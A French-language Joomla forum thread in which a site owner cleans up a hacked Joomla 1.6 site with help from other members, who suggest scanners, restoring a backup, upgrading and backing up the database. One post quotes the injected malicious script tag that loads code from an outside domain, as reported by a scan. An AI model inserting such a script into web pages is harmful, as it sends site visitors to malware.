Site infecté.

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Site infecté.

    Bonjour,

    Je suis nouveaux sur le forum est sur Joomla. Je n'ai aucunes compétences d'administrateur. Je sais gérer les articles, mettre à jour le site. Je comprends très bien le principe et l'organisation de Joomla mais je n'y connais rien code.

    Mon problème viens de ceci:

    Cliquez sur l'image pour l'afficher en taille normale

Nom : Capture d’écran 2014-03-28 à 22.02.54.jpg 
Affichages : 1 
Taille : 20,8 Ko 
ID : 1820229

    Cliquez sur l'image pour l'afficher en taille normale

Nom : Capture d’écran 2014-03-28 à 22.03.16.jpg 
Affichages : 1 
Taille : 23,1 Ko 
ID : 1820230

    Cliquez sur l'image pour l'afficher en taille normale

Nom : Capture d’écran 2014-03-30 à 15.58.57.jpg 
Affichages : 1 
Taille : 33,7 Ko 
ID : 1820231

    J'ai déjà viré 2 utilisateurs qui étaient en admin. J'ai changé le mot de passe (qui était déjà très fort). Je sais qu'il y a un fichier, un code, quelque part qui provoquent tout ça mais je ne sais absolument pas ou regarder. Je suis sous Joomla 1.6.
    Je peux faire la maintenance moi meme si je sais ou regarder et quoi chercher.

    Merci

  • #2
    Re : Site infecté.

    Bienvenue !

    La version 1.6 est obsolète depuis un bon moment, et comme elle n'a pas été mise à jour et 1.7 puis 2.5, elle présente des failles de sécurité qu'un pirate a pu exploiter.
    Teste le site avec sucuri.net qui te donnera des indications sur ce qui a été ajouté (faute de décrypter le nom de domaine, je n'ia pas pu le vérifier moi-même), puis donne-nous ces informations complémentaires.

    L'idéal serait de retrouver une sauvegarde saine pour la restaurer après avoir totalement vidé le site piraté, puis de migrer au plus vite en version 2.5 !
    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
    MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

    Commentaire


    • #3
      Re : Site infecté.

      Merci pour cette réponse très rapide.

      je viens de scanner les site avec sucuri.net. J'ai obtenu ce que je sais déjà, c'est dire que mon site est compromis. Sucuri.net ne m'a donné aucunes precisions. Est-ce que les fonctions premium de sucuri.net peuvent m'êtres utiles et désinfecter mon site?
      Je pourrais par la suite faire une mis à jour vers 2.5.

      Commentaire


      • #4
        Re : Site infecté.

        Sucuri.net donne pourtant des infos utilisables, type scripts qui ne devraient pas être présents.
        Peux-tu donner l'adresse du site ?

        Je n'ai personnellement jamais fait appel aux fonctions payantes de Sucuri.net, les onglets donnant suffisamment de renseignements, en général, pour à peu près savoir.

        Mais comme je l'ai dit, souvent le plus simple est de vider le répertoire du site pour y remettre une version saine précédemment sauvegardée.
        Dernière édition par RobertG à 30/03/2014, 18h22
        "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
        MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

        Commentaire


        • #5
          Re : Site infecté.

          Envoyé par RobertG Voir le message
          Sucuri.net donne pourtant des infos utilisables, type scripts qui ne devraient pas être présents.
          Peux-tu donner l'adresse du site ?

          Je n'ai personnellement jamais fait appel aux fonctions payantes de Sucuri.net, les onglets donnant suffisamment de renseignements, en général, pour à peu près savoir.

          Mais comme je l'ai dit, souvent le plus simple est de vider le répertoire du site pour y remettre une version saine précédemment sauvegardée.

          Voici l'adresse du site:
          maliabendimerad.com

          I y a aussi malibendimerad.fr et malia.fr qui pointe sur le principal maliabendimerad.com

          J'ai aussi suivi les conseils de aeSecure, j'ai d'ailleurs installé le module.
          J'ai aussi consulté le dates des fichiers, car je suppose que cela correspond souvent à la date de la dernière modif. Le problème c'est qu'il doit y avoir des modifs provoquées par le système lui même et des modifs provoquées par une personne, non?
          J'ai trouvé le dossier mod_fxprev avec une date au 28. Si cette date indique que le dossier a été modifié par une personne je viens de trouver un problème?

          (MAJ)
          Je viens d'utiliser le "webmasters tools security" et j'ai les details des fichiers infectés. Je vais voir d'abord si je peux me débrouiller tout seul
          Dernière édition par prommix à 30/03/2014, 19h36

          Commentaire


          • #6
            Re : Site infecté.

            Voilà l'analyse de Googe web masters tools

            Logiciel malveillant non reconnu
            Ces pages redirigent les internautes vers un site qui comporte des logiciels malveillants. Malheureusement, le code malveillant présent dans la page n'a pu être isolé.
            Afficher les détails
            Exemples d'URL Dernière détection
            http://maliabendimerad.com/ -
            http://www.maliabendimerad.com/ -
            http://maliabendimerad.com/index.php -
            http://maliabendimerad.com/media.php -
            http://maliabendimerad.com/index.php/ -
            http://www.maliabendimerad.com/index.php -
            http://www.maliabendimerad.com/media.php -
            http://www.maliabendimerad.com/index.php/ -
            http://maliabendimerad.com/?lang=EN -
            http://maliabendimerad.com/?lang=FR -


            Injection de code de logiciel malveillant
            Ces pages redirigent les internautes vers un site qui comporte des logiciels malveillants.
            Afficher les détails
            Exemples d'URL Dernière détection
            http://maliabendimerad.com/index.php/en/ 28/03/2014
            http://maliabendimerad.com/index.php/fr/multimedia 28/03/2014
            http://www.maliabendimerad.com/index.php/en/ 28/03/2014
            http://www.maliabendimerad.com/index.php/en/?lang=EN 28/03/2014
            http://www.maliabendimerad.com/index.php/en/?lang=FR 28/03/2014
            http://www.maliabendimerad.com/index.php/en/biography 28/03/2014
            http://www.maliabendimerad.com/index.php/en/contact 28/03/2014
            http://www.maliabendimerad.com/index.php/en/medias 28/03/2014
            http://www.maliabendimerad.com/index.php/en/pictures 28/03/2014
            http://www.maliabendimerad.com/index.php/en/press 28/03/2014

            Un exemple plus précis


            Extrait suspect
            <script type="text/javascript" src="http://thebigthreebook.com/QwYygBKV.php?id=">


            Je viens d'installer et de lancer JAMSS en "deep scan". J'essaye de comprendre les résultats et notamment celui-ci

            In file ./.htaccess-> we found 1 occurence(s) of String 'system'

            J'utilise Transmit pour accéder aux fichiers du site mais je ne trouve pas ce chemin.
            Finalement trouvé, il fallait activer la visibilité des dossiers cachés dans Transmit.
            Dernière édition par prommix à 31/03/2014, 10h08

            Commentaire


            • #7
              Re : Site infecté.

              un classique malheureusement assez ch...t à désinfecter car le code à été inséré probablement par une commande find en ssh qui consiste grosso modo à prendre tout les fichiers .php et y insérer ce code...

              dans un premier temps, tu peux uploader un joomla clean qui aura pour effet d'écraser ces insertions..

              ensuite, reste à désinfecter les fichiers qui ne font pas partie du pack joomla, tu peux le faire en ssh ou manuellement, bon courage
              Christophe
              http://www.webcrea.fr

              Commentaire


              • #8
                Re : Site infecté.

                Envoyé par webcrea Voir le message
                un classique malheureusement assez ch...t à désinfecter car le code à été inséré probablement par une commande find en ssh qui consiste grosso modo à prendre tout les fichiers .php et y insérer ce code...

                dans un premier temps, tu peux uploader un joomla clean qui aura pour effet d'écraser ces insertions..

                ensuite, reste à désinfecter les fichiers qui ne font pas partie du pack joomla, tu peux le faire en ssh ou manuellement, bon courage

                Merci, je vais en avoir besoin.
                Bon, j'ai demandé au créateur du site de m'envoyer une copie saine (j'espère qu'il en a gardé une). Je vais mettre à jour Joomla en 2.5 et reinstaller tout ça.
                Une dernière question avant les grands travaux. Pour faire une sauvegarde de mon site, il suffit que je copie tous les fichiers que mon client FTP (Transmit) me montre? Je sens que c'est n'est pas si simple...

                Commentaire


                • #9
                  Re : Site infecté.

                  Il te faut aussi sauvegarder la base de données, car sans elle, pas de site.
                  "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
                  MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

                  Commentaire


                  • #10
                    Re : Site infecté.

                    Je viens de me connecter à ma gestion des bases de données via PHPadmin. Dans l'onglet "exportation" j'ai sélectionné tous les "users",j'ai sélectionné SQL, coché "transmettre" et j'ai obtenu un fichier mysql10.sql . Je me suis ensuite aperçu que seul moi, mon "user", comportait la base des données, les autres étants vides. J'ai alors recommencé l'opération en sélectionnant dans le menu déroulant mon "user" et là il y avait des fichiers jmal_ que j'ai sélectionné. J'ai donc utilisé le même procédé et j'ai obtenu un fichier userXXXXX.sql

                    J'espère que cette "Base de données" n'est pas touchée par l'infection. Il aurait fallu que les personnes aient accès à mon hébergeur et s'identifier. Enfin si j'ai bien compris.
                    Dernière édition par prommix à 31/03/2014, 11h28

                    Commentaire


                    • #11
                      Re : Site infecté.

                      Je ne parlais pas de faire une réinstall mais juste un upload d'un joomla sain... sans le répertoire installation...
                      tu n'as pas besoin de toucher à la base
                      Christophe
                      http://www.webcrea.fr

                      Commentaire


                      • #12
                        Re : Site infecté.

                        Envoyé par prommix Voir le message
                        Je viens de me connecter à ma gestion des bases de données via PHPadmin. Dans l'onglet "exportation" j'ai sélectionné tous les "users",j'ai sélectionné SQL, coché "transmettre" et j'ai obtenu un fichier mysql10.sql . Je me suis ensuite aperçu que seul moi, mon "user", comportait la base des données, les autres étants vides. J'ai alors recommencé l'opération en sélectionnant dans le menu déroulant mon "user" et là il y avait des fichiers jmal_ que j'ai sélectionné. J'ai donc utilisé le même procédé et j'ai obtenu un fichier userXXXXX.sql

                        J'espère que cette "Base de données" n'est pas touchée par l'infection. Il aurait fallu que les personnes aient accès à mon hébergeur et s'identifier. Enfin si j'ai bien compris.
                        J'ai du mal à comprendre ce que tu as pu exporter, mais manifestement, ça ne semble pas du tout correspondre à la totalité des tables d'un site Joomla!
                        Il faut que tu sélectionnes le nom de la base dans la colonne de gauche de phpMyAdmin, puis que tu cliques à droite sur "exporter" et que tu sélectionnes toutes les tables dont le préfixe est défini dans le fichier "configuration.php", à la racine du site.
                        Sans procéder de cette manière, il y a toutes chances pour que tu aies une sauvegarde incomplète de la base.
                        "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
                        MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

                        Commentaire


                        • #13
                          Re : Site infecté.

                          Hier.
                          Mise à jours du site en 2.5, installation du module aeSecure et envoie d'une demande à Google d'effacement du "blacklisting".

                          Aujourd'hui
                          Tout fonctionne à merveille, juste quelques bugs d'affichage qui doivent provenir de la maj et que je vais régler rapidement.

                          Merci pour votre aide et vos conseils

                          Commentaire


                          • #14
                            Re : Site infecté.

                            Bonjour

                            Envoyé par prommix Voir le message
                            Tout fonctionne à merveille, juste quelques bugs d'affichage qui doivent provenir de la maj et que je vais régler rapidement.
                            Il est donc grand temps (si cela n'est pas encore fait) de prendre un backup de ton site et d'installer un logiciel de protection qui aura pour mission de bloquer un maximum d'attaques. aeSecure propose ces protections; voir ma signature.

                            Tu pourras activer un très grand nombre de blocages puis, individuellement, activer telle ou telle protection spécifique comme, p.ex. sur un site n'évoluant pas ou plus beaucoup, bloquer l'upload ==> si pas d'upload, impossibilité d'installer sur ton site une bestiole (à moins que la bestiole passe par un autre site web; hebergé sur le même serveur). Avec aeSecure, tu fermeras un très grand nombre de portes et de fenêtres.

                            Bonne journée.
                            Christophe (cavo789)
                            Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                            Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                            Commentaire


                            • #15
                              Re : Site infecté.

                              Envoyé par cavo789 Voir le message
                              Bonjour



                              Il est donc grand temps (si cela n'est pas encore fait) de prendre un backup de ton site et d'installer un logiciel de protection qui aura pour mission de bloquer un maximum d'attaques. aeSecure propose ces protections; voir ma signature.

                              Tu pourras activer un très grand nombre de blocages puis, individuellement, activer telle ou telle protection spécifique comme, p.ex. sur un site n'évoluant pas ou plus beaucoup, bloquer l'upload ==> si pas d'upload, impossibilité d'installer sur ton site une bestiole (à moins que la bestiole passe par un autre site web; hebergé sur le même serveur). Avec aeSecure, tu fermeras un très grand nombre de portes et de fenêtres.

                              Bonne journée.
                              J'ai déjà installé aeSecure (c'est la première chose que j'ai faite) et j'ai récupéré un backup.

                              Merci

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X